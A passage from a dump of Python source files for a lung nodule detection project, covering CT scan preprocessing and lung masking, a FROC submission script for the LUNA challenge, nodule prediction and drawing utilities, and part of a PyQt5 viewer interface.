reader = sitk.ImageSeriesReader()
dcm_series = reader.GetGDCMSeriesFileNames(filename)
reader.SetFileNames(dcm_series)
img = reader.Execute()
segmentation = mask.apply(img)
result_out= sitk.GetImageFromArray(segmentation)
output = output+'.mhd'
sitk.WriteImage(result_out, output)
def get_lung_mhd(filename, output):
img = sitk.ReadImage(filename)
segmentation = mask.apply(img)
result_out= sitk.GetImageFromArray(segmentation)
output = output+'.mhd'
sitk.WriteImage(result_out, output)
def resample(image, spacing, new_spacing=[1.0, 1.0, 1.0], order=1):
"""
Resample image from the original spacing to new_spacing, e.g. 1x1x1
image: 3D numpy array of raw HU values from CT series in [z, y, x] order.
spacing: float * 3, raw CT spacing in [z, y, x] order.
new_spacing: float * 3, new spacing used for resample, typically 1x1x1,
which means standardizing the raw CT with different spacing all into
1x1x1 mm.
order: int, order for resample function scipy.ndimage.interpolation.zoom
return: 3D binary numpy array with the same shape of the image after,
resampling. The actual resampling spacing is also returned.
"""
# shape can only be int, so has to be rounded.
new_shape = np.round(image.shape * spacing / new_spacing)
# the actual spacing to resample.
resample_spacing = spacing * image.shape / new_shape
resize_factor = new_shape / image.shape
image_new = scipy.ndimage.interpolation.zoom(image, resize_factor,
mode='nearest', order=order)
return (image_new, resample_spacing)
def get_lung_box(binary_mask, new_shape, margin=5):
"""
Get the lung barely surrounding the lung based on the binary_mask and the
new_spacing.
binary_mask: 3D binary numpy array with the same shape of the image,
that only region of both sides of the lung is True.
new_shape: tuple of int * 3, new shape of the image after resamping in
[z, y, x] order.
margin: int, number of voxels to extend the boundry of the lung box.
return: 3x2 2D int numpy array denoting the
[z_min:z_max, y_min:y_max, x_min:x_max] of the lung box with respect to
the image after resampling.
"""
# list of z, y x indexes that are true in binary_mask
z_true, y_true, x_true = np.where(binary_mask)
old_shape = binary_mask.shape
lung_box = np.array([[np.min(z_true), np.max(z_true)],
[np.min(y_true), np.max(y_true)],
[np.min(x_true), np.max(x_true)]])
lung_box = lung_box * 1.0 * \
np.expand_dims(new_shape, 1) / np.expand_dims(old_shape, 1)
lung_box = np.floor(lung_box).astype('int')
z_min, z_max = lung_box[0]
y_min, y_max = lung_box[1]
x_min, x_max = lung_box[2]
# extend the lung_box by a margin
lung_box[0] = max(0, z_min-margin), min(new_shape[0], z_max+margin)
lung_box[1] = max(0, y_min-margin), min(new_shape[1], y_max+margin)
lung_box[2] = max(0, x_min-margin), min(new_shape[2], x_max+margin)
return lung_box
def worldToVoxelCoord(worldCoord, origin, spacing):
stretchedVoxelCoord = np.absolute(worldCoord - origin)
voxelCoord = stretchedVoxelCoord / spacing
return voxelCoord
def load_itk_image(filename):
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def load_itk_dicom(filename):
reader = sitk.ImageSeriesReader()
dcm_series = reader.GetGDCMSeriesFileNames(filename)
reader.SetFileNames(dcm_series)
img = reader.Execute()
numpyImage = sitk.GetArrayFromImage(img)
numpyOrigin = np.array(list(reversed(img.GetOrigin())))
numpySpacing = np.array(list(reversed(img.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing
def load_itk_series(filedir):
img_dir = config["img_dir"]
filename = os.path.join(img_dir, filedir)
reader = sitk.ImageSeriesReader()
seriesIDs = reader.GetGDCMSeriesIDs(filename)
seriesIDsnew = []
for i in range(0, len(seriesIDs)):
print("processing %s"%seriesIDs[i])
dcm_series = reader.GetGDCMSeriesFileNames(filename, seriesIDs[i])
reader.SetFileNames(dcm_series)
img = reader.Execute()
numpyImage = sitk.GetArrayFromImage(img)
if numpyImage.shape[0]<=10:
continue
else:
seriesIDsnew.append(seriesIDs[i])
output = os.path.join(config["mhd_dir"], seriesIDs[i]+'.mhd')
sitk.WriteImage(img, output)
return filedir+" "+" ".join(seriesIDsnew)
def lumTrans(image, HU_min=-1200.0, HU_max=600.0, HU_nan=-2000.0):
"""
Convert HU unit into uint8 values. First bound HU values by predfined min
and max, and then normalize
image: 3D numpy array of raw HU values from CT series in [z, y, x] order.
HU_min: float, min HU value.
HU_max: float, max HU value.
HU_nan: float, value for nan in the raw CT image.
"""
image_new = np.array(image)
image_new[np.isnan(image_new)] = HU_nan
# normalize to [0, 1]
image_new = (image_new - HU_min) / (HU_max - HU_min)
image_new = np.clip(image_new, 0, 1)
image_new = (image_new * 255).astype('uint8')
return image_new
def convex_hull_dilate(binary_mask, dilate_factor=1.5, iterations=10):
"""
Replace each slice with convex hull of it then dilate. Convex hulls used
only if it does not increase area by dilate_factor. This applies mainly to
the inferior slices because inferior surface of lungs is concave.
binary_mask: 3D binary numpy array with the same shape of the image,
that only region of interest is True. One side of the lung in this
specifical case.
dilate_factor: float, factor of increased area after dilation
iterations: int, number of iterations for dilation
return: 3D binary numpy array with the same shape of the image,
that only region of interest is True. Each binary mask is ROI of one
side of the lung.
"""
binary_mask_dilated = np.array(binary_mask)
for i in range(binary_mask.shape[0]):
slice_binary = binary_mask[i]
if np.sum(slice_binary) > 0:
slice_convex = morphology.convex_hull_image(slice_binary)
if np.sum(slice_convex) <= dilate_factor * np.sum(slice_binary):
binary_mask_dilated[i] = slice_convex
struct = scipy.ndimage.morphology.generate_binary_structure(3, 1)
binary_mask_dilated = scipy.ndimage.morphology.binary_dilation(
binary_mask_dilated, structure=struct, iterations=10)
return binary_mask_dilated
def apply_mask(image, binary_mask1, binary_mask2, pad_value=170,
bone_thred=210, remove_bone=False):
"""
Apply the binary mask of each lung to the image. Regions out of interest
are replaced with pad_value.
image: 3D uint8 numpy array with the same shape of the image.
binary_mask1: 3D binary numpy array with the same shape of the image,
that only one side of lung is True.
binary_mask2: 3D binary numpy array with the same shape of the image,
that only the other side of lung is True.
pad_value: int, uint8 value for padding image regions that is not
interested.
bone_thred: int, uint8 threahold value for determine parts of image is
bone.
return: D uint8 numpy array with the same shape of the image after
applying the lung mask.
"""
binary_mask = binary_mask1 + binary_mask2
binary_mask1_dilated = convex_hull_dilate(binary_mask1)
binary_mask2_dilated = convex_hull_dilate(binary_mask2)
binary_mask_dilated = binary_mask1_dilated + binary_mask2_dilated
binary_mask_extra = binary_mask_dilated ^ binary_mask
# replace image values outside binary_mask_dilated as pad value
image_new = image * binary_mask_dilated + \
pad_value * (1 - binary_mask_dilated).astype('uint8')
# set bones in extra mask to 170 (ie convert HU > 482 to HU 0;
# water).
if remove_bone:
image_new[image_new * binary_mask_extra > bone_thred] = pad_value
return image_new
def savenpy_luna_attribute(params_lists):
inputpath, savepath, maskpath = params_lists
print("Save %s to numpy"%inputpath)
islabel = True
isClean = True
resolution = np.array([1, 1, 1])
sliceim, origin, spacing = load_itk_image(inputpath)
lung_mask, _, _ = load_itk_image(maskpath)
np.save(savepath + '_origin.npy', origin)
np.save(savepath + '_spacing.npy', spacing)
binary_mask1, binary_mask2 = lung_mask == 1, lung_mask == 2
binary_mask = binary_mask1 + binary_mask2
ori_sliceim_shape_yx = sliceim.shape[1:3]
sliceim = lumTrans(sliceim)
sliceim = apply_mask(sliceim, binary_mask1, binary_mask2)
sliceim1, _ = resample(sliceim, spacing, resolution, order=1)
seg_img = sliceim1
"""
lung_box = get_lung_box(binary_mask, seg_img.shape)
z_min, z_max = lung_box[0]
y_min, y_max = lung_box[1]
x_min, x_max = lung_box[2]
seg_img = seg_img[z_min:z_max, y_min:y_max, x_min:x_max]
#sliceim = sliceim1[np.newaxis, ...]
"""
np.save(savepath + '_clean.npy', seg_img)
#nrrd.write(savepath + '_clean.nrrd', seg_img)
return 1
def main():
img_dir = config["img_dir"]
data_txt = config["data_txt"]
lung_mask_dir = config["lung_mask_dir"]
npy_dir = config["npy_dir"]
mhd_dir = config['mhd_dir']
if not os.path.exists(lung_mask_dir):
os.makedirs(lung_mask_dir)
if not os.path.exists(npy_dir):
os.makedirs(npy_dir)
if not os.path.exists(mhd_dir):
os.makedirs(mhd_dir)
with open(data_txt, "r") as f:
lines = f.readlines()
record_series = []
record = []
params_lists = []
for line in lines:
line = line.rstrip()
savedir = '_'.join(line.split("/"))
params_lists.append(line)
pool = Pool(processes=10)
result = pool.map(load_itk_series, params_lists)
for item in result:
record_series.append(item)
pool.close()
pool.join()
print(record_series)
with open("record_folder_series.txt",'w') as f:
f.write('\n'.join(record_series))
record_name = []
for line in record_series:
line = line.rstrip()
line = line.split(' ')
for i in range(1, len(line)):
record_name.append(line[i])
with open("record_series_list.txt",'w') as f:
f.write('\n'.join(record_name))
for line in record_name:
print("lung segmentation:", line)
line = line.rstrip()
savedir = line
get_lung_mhd(os.path.join(mhd_dir, line+'.mhd'), os.path.join(lung_mask_dir, line))
params_lists = []
for line in record_name:
print(line)
line = line.rstrip()
savename = line
npy_savepath = os.path.join(npy_dir, savename)
mask_savepath = os.path.join(lung_mask_dir, savename+'.mhd')
params_lists.append([os.path.join(mhd_dir, line+'.mhd'), npy_savepath, mask_savepath])
pool = Pool(processes=10)
pool.map(savenpy_luna_attribute, params_lists)
pool.close()
pool.join()
if __name__=='__main__':
main()
```
#### File: JiazeWang/lung_nodule_detector/make_FROC_submit_native.py
```python
import numpy as np
import sys
sys.path.append('../')
from training.layers import nms, iou, acc
import time
import multiprocessing as mp
import math
import SimpleITK as sitk
import os
from config_training import config
import pandas
import csv
import io
save_dir = 'results/res18_split_focal/bbox/'
submit_file = './luna_submission_res18_split_classify.csv'
sid = './val9_sid.csv'
val_num = np.load('val9.npy')
luna_data = config['luna_data']
luna_label = './labels/lunaqualified_all.csv'
shorter_label = './labels/shorter.csv'
resolution = np.array([1,1,1])
annos = np.array(pandas.read_csv(luna_label))
abbrevs = np.array(pandas.read_csv(shorter_label, header=None))
namelist = abbrevs[:, 1]
ids = list(abbrevs[:, 0])
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def load_itk_image(filename):
with open(filename) as f:
contents = f.readlines()
line = [k for k in contents if k.startswith('TransformMatrix')][0]
transformM = np.array(line.split(' = ')[1].split(' ')).astype('float')
transformM = np.round(transformM)
if np.any( transformM!=np.array([1,0,0, 0, 1, 0, 0, 0, 1])):
isflip = True
else:
isflip = False
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing, isflip
def convert_worldcoord(idx, pbb, filename_dict):
sliceim, origin, spacing, isflip = load_itk_image(os.path.join(luna_data, filename_dict[idx] + '.mhd'))
#Mask, extendbox = Mask_info(idx, filename_dict)
ori_sliceim_shape_yx = sliceim.shape[1:3]
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
pos_ori = pos_ori * resolution / spacing
if isflip:
pos_ori[1:] = ori_sliceim_shape_yx - pos_ori[1:]
pos_ori[1] = pos_ori[1] * -1
pos_ori[2] = pos_ori[2] * -1
pos_ori = pos_ori * spacing
pos_ori = pos_ori + origin
pos_ori = pos_ori[::-1]
radious_ori = radious_ori / spacing[1] * resolution[1]
radious_ori = radious_ori * spacing[1]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
def duplicate_file(in_filename):
out_filename = in_filename + '.bin'
byte_string = ''
with open(in_filename, 'r') as infile:
with open(out_filename, 'wb') as outfile:
char = infile.read(1)
byte = ord(char)
# print byte
byte_string += chr(byte)
while char != "":
char = infile.read(1)
if char != "":
byte = ord(char)
# print byte
byte_string += chr(byte)
outfile.write(byte_string)
outfile.close()
if __name__ == '__main__':
pbb = []
lbb = []
filename_dict = {}
csv_submit = []
csv_sid = []
print ("datadir", luna_data)
for i in range(len(val_num)):
pbb_item = np.load(save_dir + str(val_num[i]) + '_pbb.npy')
lbb_item = np.load(save_dir + str(val_num[i]) + '_lbb.npy')
filename_dict[i] = str(val_num[i])
pbb_item = pbb_item[pbb_item[:, 0].argsort()[::-1]]
pbb_append_list = []
for item in pbb_item:
#append nocule prob > 0.1
if sigmoid(item[0]) < 0.1:
continue
#check overlap under 3mm
is_overlap = False
for appended in pbb_append_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[0] - item[0], 2) + math.pow(appended[1] - item[1], 2) + math.pow(
appended[2] - item[2], 2))
if (dist < minimum_dist):
is_overlap = True
break;
if not is_overlap:
pbb_append_list.append(item)
pbb.append(np.array(pbb_append_list))
lbb.append(lbb_item)
pbb = np.array(pbb)
lbb = np.array(lbb)
conf_th = 0.1
nms_th = 0.3
detect_th = 0.3
for i in range(len(pbb)):
nms_pbb = nms(pbb[i], nms_th)
world_pbb = convert_worldcoord(i, nms_pbb, filename_dict)
print (filename_dict[i])
s_id = namelist[ids.index(int(filename_dict[i]))]
#csv_sid.append([s_id.encode()])
csv_sid.append([s_id])
for candidate in world_pbb:
csv_submit.append([s_id, candidate[1], candidate[2], candidate[3], candidate[0]])
df_annos = pandas.DataFrame(csv_submit, columns=["seriesuid", "coordX", "coordY", "coordZ", "probability"])
df_annos.to_csv(submit_file, index=False)
df_annos = pandas.DataFrame(csv_sid)
df_annos.to_csv(sid, index=False, header=False)
``` |
{
"source": "JiazeWang/lung_nodule_integ_viewer",
"score": 2
} |
#### File: JiazeWang/lung_nodule_integ_viewer/UI_util.py
```python
import SimpleITK as sitk
import numpy as np
import torch
import math
import time
import sys
import cv2
from scipy.ndimage.interpolation import zoom
from torch.autograd import Variable
sys.path.append('../lung_nodule_detector')
from training.layers import nms
def load_itk_image(filename):
with open(filename) as f:
contents = f.readlines()
line = [k for k in contents if k.startswith('TransformMatrix')][0]
transformM = np.array(line.split(' = ')[1].split(' ')).astype('float')
transformM = np.round(transformM)
if np.any(transformM != np.array([1, 0, 0, 0, 1, 0, 0, 0, 1])):
isflip = True
else:
isflip = False
itkimage = sitk.ReadImage(filename)
numpyImage = sitk.GetArrayFromImage(itkimage)
numpyOrigin = np.array(list(reversed(itkimage.GetOrigin())))
numpySpacing = np.array(list(reversed(itkimage.GetSpacing())))
return numpyImage, numpyOrigin, numpySpacing, isflip
def lumTrans(img):
lungwin = np.array([-1200.,600.])
newimg = (img-lungwin[0])/(lungwin[1]-lungwin[0])
newimg[newimg<0]=0
newimg[newimg>1]=1
newimg = (newimg*255).astype('uint8')
return newimg
def resample(imgs, spacing, new_spacing, progressBar, order=2):
print (len(imgs.shape))
if len(imgs.shape)==3:
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = zoom(imgs, resize_factor, mode = 'nearest',order=order)
progressBar.setValue(40)
return imgs, true_spacing
elif len(imgs.shape)==4:
n = imgs.shape[-1]
newimg = []
for i in range(n):
slice = imgs[:,:,:,i]
newslice,true_spacing = resample(slice,spacing,new_spacing)
newimg.append(newslice)
newimg=np.transpose(np.array(newimg),[1,2,3,0])
return newimg,true_spacing
else:
raise ValueError('wrong shape')
def resample_v1(imgs, spacing, new_spacing, order=2):
print (len(imgs.shape))
if len(imgs.shape)==3:
new_shape = np.round(imgs.shape * spacing / new_spacing)
true_spacing = spacing * imgs.shape / new_shape
resize_factor = new_shape / imgs.shape
imgs = zoom(imgs, resize_factor, mode = 'nearest',order=order)
return imgs, true_spacing
elif len(imgs.shape)==4:
n = imgs.shape[-1]
newimg = []
for i in range(n):
slice = imgs[:,:,:,i]
newslice,true_spacing = resample(slice,spacing,new_spacing)
newimg.append(newslice)
newimg=np.transpose(np.array(newimg),[1,2,3,0])
return newimg,true_spacing
else:
raise ValueError('wrong shape')
def split_data(data, stride, split_comber):
print (data.shape[1:])
nz, nh, nw = data.shape[1:]
pz = int(np.ceil(float(nz) / stride)) * stride
ph = int(np.ceil(float(nh) / stride)) * stride
pw = int(np.ceil(float(nw) / stride)) * stride
data = np.pad(data, [[0, 0], [0, pz - nz], [0, ph - nh], [0, pw - nw]], 'constant', constant_values=0)
xx, yy, zz = np.meshgrid(np.linspace(-0.5, 0.5, data.shape[1] / stride),
np.linspace(-0.5, 0.5, data.shape[2] / stride),
np.linspace(-0.5, 0.5, data.shape[3] / stride), indexing='ij')
coord = np.concatenate([xx[np.newaxis, ...], yy[np.newaxis, ...], zz[np.newaxis, :]], 0).astype('float32')
data, nzhw = split_comber.split(data)
coord2, nzhw2 = split_comber.split(coord,
side_len=split_comber.side_len / stride,
max_stride=split_comber.max_stride / stride,
margin=split_comber.margin / stride)
assert np.all(nzhw == nzhw2)
data = (data.astype(np.float32) - 128) / 128
return torch.from_numpy(data), torch.from_numpy(coord2), np.array(nzhw)
def convert_prob(pbb):
for label in pbb:
pos_ori = label[1:4]
radious_ori = label[4]
#pos_ori = pos_ori + extendbox[:, 0]
label[1:4] = pos_ori
label[4] = radious_ori
label[0] = sigmoid(label[0])
return pbb
def sigmoid(x):
return 1 / (1 + math.exp(-x))
def predict_nodule(net, data, coord, nzhw, lbb, n_per_run, split_comber, get_pbb, progressBar):
net.eval()
total_label = 0
total_candi = 0
splitlist = list(range(0, len(data) + 1, n_per_run))
if splitlist[-1] != len(data):
splitlist.append(len(data))
outputlist = []
for i in range(len(splitlist) - 1):
with torch.no_grad():
inputdata = Variable(data[splitlist[i]:splitlist[i + 1]]).cuda()
inputcoord = Variable(coord[splitlist[i]:splitlist[i + 1]]).cuda()
output = net(inputdata, inputcoord)
outputlist.append(output.data.cpu().numpy())
progressBar.setValue(10 + (80/len(splitlist) * (i+1)))
output = np.concatenate(outputlist, 0)
output = split_comber.combine(output, nzhw=nzhw)
# fps 1.215909091, sens 0.933333333, thres 0.371853054
thresh = 0.371853054
pbb, mask = get_pbb(output, thresh, ismask=True)
pbb = pbb[pbb[:, 0].argsort()[::-1]]
pbb_cand_list = []
# check overlap under 3mm
for cand in pbb:
is_overlap = False
for appended in pbb_cand_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[1] - cand[1], 2) + math.pow(appended[2] - cand[2], 2) + math.pow(
appended[3] - cand[3], 2))
if (dist < minimum_dist):
is_overlap = True
break;
if not is_overlap:
pbb_cand_list.append(cand)
pbb_cand_list = np.array(pbb_cand_list)
pbb_cand_list_nms = nms(pbb_cand_list, 0.3)
# print (name)
# print (lbb)
world_pbb = convert_prob(pbb_cand_list_nms)
# print (world_pbb)
print("label", len(lbb))
print("z_pos y_pos x_pos size")
for i in range(len(lbb)):
for j in range(len(lbb[i])):
print(round(lbb[i][j], 2), end='\t')
print()
print("candidate", len(world_pbb))
print("prob z_pos y_pos x_pos size")
for i in range(len(world_pbb)):
for j in range(len(world_pbb[i])):
print(round(world_pbb[i][j], 2), end='\t')
print()
total_label += len(lbb)
total_candi += len(world_pbb)
return lbb, world_pbb
def predict_nodule_v1(net, data, coord, nzhw, lbb, n_per_run, split_comber, get_pbb):
net.eval()
total_label = 0
total_candi = 0
splitlist = list(range(0, len(data) + 1, n_per_run))
if splitlist[-1] != len(data):
splitlist.append(len(data))
outputlist = []
for i in range(len(splitlist) - 1):
with torch.no_grad():
inputdata = Variable(data[splitlist[i]:splitlist[i + 1]]).cuda()
inputcoord = Variable(coord[splitlist[i]:splitlist[i + 1]]).cuda()
output = net(inputdata, inputcoord)
outputlist.append(output.data.cpu().numpy())
output = np.concatenate(outputlist, 0)
output = split_comber.combine(output, nzhw=nzhw)
# fps 1.215909091, sens 0.933333333, thres 0.371853054
thresh = 0.371853054
pbb, mask = get_pbb(output, thresh, ismask=True)
pbb = pbb[pbb[:, 0].argsort()[::-1]]
pbb_cand_list = []
# check overlap under 3mm
for cand in pbb:
is_overlap = False
for appended in pbb_cand_list:
minimum_dist = 3
dist = math.sqrt(
math.pow(appended[1] - cand[1], 2) + math.pow(appended[2] - cand[2], 2) + math.pow(
appended[3] - cand[3], 2))
if (dist < minimum_dist):
is_overlap = True
break;
if not is_overlap:
pbb_cand_list.append(cand)
pbb_cand_list = np.array(pbb_cand_list)
pbb_cand_list_nms = nms(pbb_cand_list, 0.3)
# print (name)
# print (lbb)
world_pbb = convert_prob(pbb_cand_list_nms)
# print (world_pbb)
print("label", len(lbb))
print("z_pos y_pos x_pos size")
for i in range(len(lbb)):
for j in range(len(lbb[i])):
print(round(lbb[i][j], 2), end='\t')
print()
print("candidate", len(world_pbb))
print("prob z_pos y_pos x_pos size")
for i in range(len(world_pbb)):
for j in range(len(world_pbb[i])):
print(round(world_pbb[i][j], 2), end='\t')
print()
total_label += len(lbb)
total_candi += len(world_pbb)
return lbb, world_pbb
def draw_nodule_rect(lbb, world_pbb, img_arr):
for i in range(len(lbb)):
label = lbb[i]
# label = np.ceil(label)
r = (label[3] / 2) * 1.3
top_left = (max(int(math.ceil(label[2] - r)), 0),
max(int(math.ceil(label[1] - r)), 0))
bottom_right = (min(int(math.ceil(label[2] + r)), np.shape(img_arr)[1]),
min(int(math.ceil(label[1] + r)), np.shape(img_arr)[2]))
z_range = [max(int(math.ceil(label[0] - r)), 0),
min(int(math.ceil(label[0] + r)), np.shape(img_arr)[0])]
for j in range(z_range[0], z_range[1]):
cv2.rectangle(img_arr[j], top_left, bottom_right, (0, 255, 0), 1)
for i in range(len(world_pbb)):
candidate = world_pbb[i]
r = (candidate[4] / 2) * 1.3
top_left = (max(int(math.ceil(candidate[3] - r)), 0),
max(int(math.ceil(candidate[2] - r)), 0))
text_top_left = (max(int(math.ceil(candidate[3] - r)) - 1, 0),
max(int(math.ceil(candidate[2] - r)) - 1, 0))
bottom_right = (min(int(math.ceil(candidate[3] + r)), np.shape(img_arr)[1]),
min(int(math.ceil(candidate[2] + r)), np.shape(img_arr)[2]))
z_range = [max(int(math.ceil(candidate[1] - r)), 0),
min(int(math.ceil(candidate[1] + r)), np.shape(img_arr)[0])]
font = cv2.FONT_HERSHEY_SIMPLEX
for j in range(z_range[0], z_range[1]):
cv2.rectangle(img_arr[j], top_left, bottom_right, (255, 0, 0), 1)
#cv2.putText(img_arr[j], "c" + str(i) + "_" +str(round(candidate[0], 2)), top_left, font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
cv2.putText(img_arr[j], "c" + str(i), text_top_left, font, 0.4, (255, 0, 0), 1, cv2.LINE_AA)
def crop_all(target, img_arr, crop_size = 48):
target = np.copy(target)
start = []
for i in range(3):
start.append(int(round(target[i])) - int(crop_size / 2))
pad = []
pad.append([0, 0])
for i in range(3):
leftpad = max(0, -start[i])
rightpad = max(0, start[i] + crop_size - img_arr.shape[i + 1])
pad.append([leftpad, rightpad])
crop = img_arr[:,
max(start[0], 0):min(start[0] + crop_size, img_arr.shape[1]),
max(start[1], 0):min(start[1] + crop_size, img_arr.shape[2]),
max(start[2], 0):min(start[2] + crop_size, img_arr.shape[3])]
crop = np.pad(crop, pad, 'constant', constant_values=0)
for i in range(3):
target[i] = target[i] - start[i]
return crop, target
def crop_nodule_arr_2ch(target, img_arr, crop_size = 48):
img_size = [crop_size, crop_size, crop_size]
crop_img, target = crop_all(target, img_arr, crop_size)
imgs = np.squeeze(crop_img, axis=0)
z = int(target[0])
y = int(target[1])
x = int(target[2])
print (z, y, x)
# z = 24
# y = 24
# x = 24
nodule_size = int(target[3])
margin = max(7, nodule_size * 0.4)
radius = int((nodule_size + margin) / 2)
s_z_pad = 0
e_z_pad = 0
s_y_pad = 0
e_y_pad = 0
s_x_pad = 0
e_x_pad = 0
s_z = max(0, z - radius)
if (s_z == 0):
s_z_pad = -(z - radius)
e_z = min(np.shape(imgs)[0], z + radius)
if (e_z == np.shape(imgs)[0]):
e_z_pad = (z + radius) - np.shape(imgs)[0]
s_y = max(0, y - radius)
if (s_y == 0):
s_y_pad = -(y - radius)
e_y = min(np.shape(imgs)[1], y + radius)
if (e_y == np.shape(imgs)[1]):
e_y_pad = (y + radius) - np.shape(imgs)[1]
s_x = max(0, x - radius)
if (s_x == 0):
s_x_pad = -(x - radius)
e_x = min(np.shape(imgs)[2], x + radius)
if (e_x == np.shape(imgs)[2]):
e_x_pad = (x + radius) - np.shape(imgs)[2]
# print (s_x, e_x, s_y, e_y, s_z, e_z)
# print (np.shape(img_arr[s_z:e_z, s_y:e_y, s_x:e_x]))
nodule_img = imgs[s_z:e_z, s_y:e_y, s_x:e_x]
nodule_img = np.pad(nodule_img, [[s_z_pad, e_z_pad], [s_y_pad, e_y_pad], [s_x_pad, e_x_pad]], 'constant',
constant_values=0)
imgpad_size = [img_size[0] - np.shape(nodule_img)[0],
img_size[1] - np.shape(nodule_img)[1],
img_size[2] - np.shape(nodule_img)[2]]
imgpad = []
imgpad_left = [int(imgpad_size[0] / 2),
int(imgpad_size[1] / 2),
int(imgpad_size[2] / 2)]
imgpad_right = [int(imgpad_size[0] / 2),
int(imgpad_size[1] / 2),
int(imgpad_size[2] / 2)]
for i in range(3):
if (imgpad_size[i] % 2 != 0):
rand = np.random.randint(2)
if rand == 0:
imgpad.append([imgpad_left[i], imgpad_right[i] + 1])
else:
imgpad.append([imgpad_left[i] + 1, imgpad_right[i]])
else:
imgpad.append([imgpad_left[i], imgpad_right[i]])
padding_crop = np.pad(nodule_img, imgpad, 'constant', constant_values=0)
padding_crop = np.expand_dims(padding_crop, axis=0)
crop = np.concatenate((padding_crop, crop_img))
crop = (crop.astype(np.float32) - 128) / 128
return torch.from_numpy(crop), crop
def predict_attribute(attribute_net, crop_img):
attribute_net.eval()
with torch.no_grad():
crop_img = Variable(crop_img.cuda(async=True))
output = attribute_net(crop_img)
return output
```
#### File: JiazeWang/lung_nodule_integ_viewer/xai_viewer_ui.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_xai_viewer(object):
def setupUi(self, xai_viewer):
xai_viewer.setObjectName("xai_viewer")
xai_viewer.resize(1240, 1200)
self.centralwidget = QtWidgets.QWidget(xai_viewer)
self.centralwidget.setObjectName("centralwidget")
self.prev_button = QtWidgets.QPushButton(self.centralwidget)
self.prev_button.setGeometry(QtCore.QRect(298, 578, 80, 22))
self.prev_button.setObjectName("prev_button")
self.next_button = QtWidgets.QPushButton(self.centralwidget)
self.next_button.setGeometry(QtCore.QRect(382, 578, 80, 22))
self.next_button.setObjectName("next_button")
self.listView = QtWidgets.QListView(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(109, 50, 171, 491))
self.listView.setObjectName("listView")
self.horizontalScrollBar = QtWidgets.QScrollBar(self.centralwidget)
self.horizontalScrollBar.setGeometry(QtCore.QRect(299, 550, 801, 16))
self.horizontalScrollBar.setOrientation(QtCore.Qt.Horizontal)
self.horizontalScrollBar.setObjectName("horizontalScrollBar")
self.slide_view_label = QtWidgets.QLabel(self.centralwidget)
self.slide_view_label.setGeometry(QtCore.QRect(979, 30, 121, 16))
self.slide_view_label.setObjectName("slide_view_label")
self.nodule_list_label = QtWidgets.QLabel(self.centralwidget)
self.nodule_list_label.setGeometry(QtCore.QRect(111, 30, 81, 16))
self.nodule_list_label.setObjectName("nodule_list_label")
self.file_name = QtWidgets.QLabel(self.centralwidget)
self.file_name.setGeometry(QtCore.QRect(299, 30, 481, 16))
self.file_name.setObjectName("file_name")
self.nodule_attribute_label = QtWidgets.QLabel(self.centralwidget)
self.nodule_attribute_label.setGeometry(QtCore.QRect(10, 610, 111, 16))
self.nodule_attribute_label.setObjectName("nodule_attribute_label")
self.detect_button = QtWidgets.QPushButton(self.centralwidget)
self.detect_button.setGeometry(QtCore.QRect(467, 578, 80, 22))
self.detect_button.setObjectName("detect_button")
self.detect_progressBar = QtWidgets.QProgressBar(self.centralwidget)
self.detect_progressBar.setGeometry(QtCore.QRect(733, 574, 118, 23))
self.detect_progressBar.setProperty("value", 24)
self.detect_progressBar.setObjectName("detect_progressBar")
self.slide_show_label = QtWidgets.QLabel(self.centralwidget)
self.slide_show_label.setGeometry(QtCore.QRect(309, 53, 791, 481))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
